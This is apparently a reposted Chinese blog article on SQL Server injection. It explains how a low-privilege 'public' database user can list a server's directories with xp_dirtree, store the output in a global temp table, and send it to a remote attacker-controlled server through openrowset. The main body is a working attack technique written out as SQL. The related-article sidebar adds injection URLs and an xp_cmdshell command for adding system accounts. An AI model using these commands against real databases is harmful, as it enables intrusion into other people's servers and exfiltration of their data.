MSSQL注入PUBLIC权限下的xp_dirtree再度利

最新推荐文章于 2022-04-12 12:51:56 发布
最新推荐文章于 2022-04-12 12:51:56 发布
阅读量1.1k 收藏
点赞数
分类专栏: 技巧文摘 文章标签: xp insert 存储 服务器 table user
MSSQL注入PUBLIC权限下的xp_dirtree再度利
文章作者:kj021320
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)


本来这文章在TEAM里面放了好久的了!只是
<<art of sql injection>>

的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...

正文:

提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表


create table ##nonamed(

       dir ntext,

       num int

)


--调用存储过程把执行回来的数据存到临时表里面


insert ##nonamed execute master..xp_dirtree 'c:/',1


--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了


insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed


以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了




 
rjgcwl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 975
sql注入用的骚姿势你又知道几个?DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
MSsqlL注入取得网站路径最好的方法.txt
07-18
`xp_dirtree`是MS SQL Server中的一个扩展存储过程,用于列出指定目录下的所有子目录及文件。该存储过程可以通过如下方式调用: ``` EXEC master..xp_dirtree 'D:\' ``` 这里的`'D:\'`指的是要遍历的磁盘根目录。...
MSSQL注入PUBLIC权限下的xp_dirtree再度
Information Security Technology Organization
08-10 2853
软件作者:kj021320信息来源:I.S.T.O技术团队(http://blog.csdn.net/I_S_T_O/)本来这文章在TEAM里面放了好久的了!只是>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...正文:提起public权限的用户估计很多人也
未能找到存储过程 master.dbo.xp_dirtree|错误2812
weixin_30443895的博客
03-21 265
未能找到存储过程 master.dbo.xp_dirtree|错误2812 解决未能找到存储过程 master.dbo.xp_dirtree 把恢复数据库需要用到的存储过程个恢复 打开MSSQL查询分析器,分别运行下面的两条数据库语句即可. ...
浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击
qq_60115503的博客
04-12 3470
LIMNR是什么? 链路本地多播名称解析(LIMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路上的主机,当局域网中的DNS服务器不可用时,DNS客户端会使用LIMNR本地链路多播名称解析来解析本地的主机名称 NetBIOS是什么? Netbios(Network Basic Input Output System):网络基本输入输出系统,提供OSI模型中的会话层服务,分享数据,是一种应用程序接口API同时系统可以用WINS服务将N
Sql2000-错误2812:xp_dirtreexp_regread错误方法
weixin_30699741的博客
07-03 366
备份数据库,企业管理器注册数据库服务发现xp_dirtreexp_regread问题的处理办法 未能找到存储过程 master.dbo.xp_dirtree 1、使用查询分析器执行以下脚本 User master EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll' EXEC sp_addextendedproc...
【转】xp_dirtree储存过程漏洞
weixin_34381666的博客
05-26 1675
sql server 2000漏洞一直很多前段时间我自己的服务器就出现了一个sql的临时储存过程漏洞漏洞扩展:xp_dirtree储存过程 事前:最近发现一个漏洞是sql服务器造成的前几天正好没有什么事情,就用阿d的sql注入工具对自己服务器的网站进行注入,偶然发现了使用mssql的网站浸染可以sql注入的形式得到整个服务器上所有目录(我的服务器作了安全设置的)依然可以看见,然后在服务器上安...
提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权
fendo
03-29 1万+
(一)、Mssql提权 必要条件:获取到mssql数据库最高权限用户sa的账号密码 Mssql默认端口:1433 Mssql最高权限用户:sa 得到sa密码之后,通过工具直接连接上去。 MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。 (二)、GetPass 提权 一款获取计算机
SQL Sever中可以使用哪个存储过程调用操作系统命令,添加系统账号?() xp_dirtree xp_cmdshell xp_xshell xpdeletekey
最新发布
06-12
SQL Server中可以使用 `xp_cmdshell` 存储过程调用操作系统命令,...但是,这个存储过程需要特殊的权限才能执行,因此应该谨慎使用。至于添加系统账号,这是一个非常危险的操作,一般情况下不应该使用存储过程来实现。
SQL Sever中可以使用哪个存储过程调用操作系统命令,添加系统账号 (2分) A xp_dirtree B xp_cmdshell C xp_xshell D xpdeletekey
06-08
SQL Server中,可以使用存储过程`xp_cmdshell`来调用操作系统命令。该存储过程允许用户在SQL ...但是,需要注意,使用`xp_cmdshell`存储过程需要特殊权限,因此应该非常小心,避免被滥用。 答案:B xp_cmdshell。
SQL Server下几个危险的扩展存储过程
01-21
这些存储过程如下: sp_makewebtask xp_cmdshell xp_dirtree xp_fileexist xp_terminate_process sp_oamethod sp_oacreate xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_...
提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享
weixin_30699465的博客
05-26 635
先罗列出sql server 角色用户的权限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插入到数据库的域帐号而设计.2.dbcreator:这个角色可以创建,更改,删除和还原任何数据库...
Mssql Public权限列目录
收集盒 Book box
03-31 719
<br />注入点执行<br />aaa.com/xxx.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarchar(500),num2 nvarchar(500))<br />注入点执行<br />aaa.com/xxx.asp?id=123;insert into %23%23dhtemq(dirtree,num1,num2) exec master
SQL手工注入基础详解----MSSQL
热门推荐
xabc3000的专栏
05-30 2万+
作者:DragonEgg 信息来源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/      一:注入点的判断      当我们在URL后特殊字符或语句,使其报错时,若在返回的信息中有类似“[Microsoft][ODBC SQL Server Driver][SQL Server]”的字样,关键在于:“Microsoft”和“S
sql注入语句大全
weixin_34239169的博客
03-31 337
sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name passwo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值